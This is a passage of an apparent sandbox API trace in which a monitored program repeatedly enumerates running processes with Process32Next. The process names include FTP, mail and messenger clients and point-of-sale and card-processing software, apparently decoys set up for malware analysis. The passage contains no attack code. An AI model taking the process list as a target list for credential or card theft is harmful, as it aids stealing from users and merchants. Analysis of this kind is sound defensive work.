th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0203.125] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0203.127] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0203.129] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0203.131] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0203.133] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0203.135] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0203.139] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0203.141] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0203.143] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0203.145] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0203.147] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0203.149] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0203.202] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0203.204] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0203.206] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0203.208] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0203.210] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0203.212] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0203.214] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0203.218] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0203.220] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0203.222] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0203.224] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0203.226] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0203.228] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0203.233] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0203.235] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0203.237] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0203.238] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0203.240] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0203.242] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0203.244] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0203.284] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0203.286] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0203.288] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0203.290] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0203.295] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0203.298] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0203.300] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0203.302] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0203.304] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0203.306] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0203.312] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0203.314] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0203.316] CloseHandle (hObject=0xde8) returned 1 [0203.316] Sleep (dwMilliseconds=0x64) [0203.436] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0203.447] Process32First (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.452] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0203.454] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0203.455] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0203.457] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0203.459] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0203.460] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0203.463] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0203.464] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0203.469] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.471] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.473] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0203.476] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.478] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.548] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.550] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.552] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.555] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.557] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.563] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0203.565] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0203.567] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0203.569] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.571] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.576] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0203.579] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0203.581] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0203.583] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0203.586] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.588] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0203.683] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0203.686] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0203.688] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0203.690] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0203.692] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0203.694] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0203.697] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0203.702] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0203.705] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0203.707] Process32Next (in: 